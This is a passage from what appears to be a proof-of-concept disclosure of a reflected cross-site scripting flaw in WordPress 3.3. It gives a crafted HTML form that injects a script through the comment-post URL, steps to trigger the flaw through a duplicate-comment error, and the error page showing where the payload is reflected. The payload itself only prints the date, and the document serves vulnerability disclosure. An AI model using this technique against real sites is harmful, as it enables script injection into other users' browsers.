sans

1. <html>
2. <title>Wordpress 3.3 XSS PoC</title>
3.  
4. <body>
5.  
6. <form name="XSS" id="XSS" action="http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>" method="POST">
7. <input type="hidden" name="author" value="replace me">
8. <input type="hidden" name="email" value="replace me">
9. <input type="hidden" name="url" value="">
10. <input type="hidden" name="comment" value="replace me">
11. <input type="hidden" name="submit" value="Post Comment">
12. <input type="hidden" name="comment_post_ID" value="replace me">
13. <input type="hidden" name="comment_parent" value="0">
14. <input type="button" value="Click Me" />
15. </form>
16.  
17. </body>
18. </html>
19.  
20. Step 3: Publish the above html file on the web server and access it. Click on "Click Me" button. This will try to post the comment to wordpress which will flag this comment as duplicate comment with the 500 Internal server error response. Here our XSS payload will get executed. Check wordpress_3.3_xss.png file.
21.  
22. Step 4: The response code where XSS payload reflects is given below
23.  
24. <!DOCTYPE html>
25. <!-- Ticket #11289, IE bug fix: always pad the error page with enough characters such that it is greater than 512 bytes, even after gzip compression abcdefghijklmnopqrstuvwxyz1234567890aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz11223344556677889900abacbcbdcdcededfefegfgfhghgihihjijikjkjlklkmlmlnmnmononpopoqpqprqrqsrsrtstsubcbcdcdedefefgfabcadefbghicjkldmnoepqrfstugvwxhyz1i234j567k890laabmbccnddeoeffpgghqhiirjjksklltmmnunoovppqwqrrxsstytuuzvvw0wxx1yyz2z113223434455666777889890091abc2def3ghi4jkl5mno6pqr7stu8vwx9yz11aab2bcc3dd4ee5ff6gg7hh8ii9j0jk1kl2lmm3nnoo4p5pq6qrr7ss8tt9uuvv0wwx1x2yyzz13aba4cbcb5dcdc6dedfef8egf9gfh0ghg1ihi2hji3jik4jkj5lkl6kml7mln8mnm9ono
26. -->
27. <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
28. <head>
29. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
30. <title>WordPress &rsaquo; Error</title>
31. <style type="text/css">
32. html {
33. background: #f9f9f9;
34. }
35. body {
36. background: #fff;
37. color: #333;
38. font-family: sans-serif;
39. margin: 2em auto;
40. padding: 1em 2em;
41. -webkit-border-radius: 3px;
42. border-radius: 3px;
43. border: 1px solid #dfdfdf;
44. max-width: 700px;
45. }
46. #error-page {
47. margin-top: 50px;
48. }
49. #error-page p {
50. font-size: 14px;
51. line-height: 1.5;
52. margin: 25px 0 20px;
53. }
54. #error-page code {
55. font-family: Consolas, Monaco, monospace;
56. }
57. ul li {
58. margin-bottom: 10px;
59. font-size: 14px ;
60. }
61. a {
62. color: #21759B;
63. text-decoration: none;
64. }
65. a:hover {
66. color: #D54E21;
67. }
68.  
69. .button {
70. font-family: sans-serif;
71. text-decoration: none;
72. font-size: 14px !important;
73. line-height: 16px;
74. padding: 6px 12px;
75. cursor: pointer;
76. border: 1px solid #bbb;
77. color: #464646;
78. -webkit-border-radius: 15px;
79. border-radius: 15px;
80. -moz-box-sizing: content-box;
81. -webkit-box-sizing: content-box;
82. box-sizing: content-box;
83. }
84.  
85. .button:hover {
86. color: #000;
87. border-color: #666;
88. }
89.  
90. .button {
91. background: #f2f2f2 url(http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>/wp-admin/images/white-grad.png) repeat-x scroll left top;
92. }
93.  
94. .button:active {
95. background: #eee url(http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>/wp-admin/images/white-grad-active.png) repeat-x scroll left top;
96. }
97. </style>
98. </head>
99. <body id="error-page">
100. <p>Duplicate comment detected; it looks as though you&#8217;ve already said that!</p></body>
101. </html>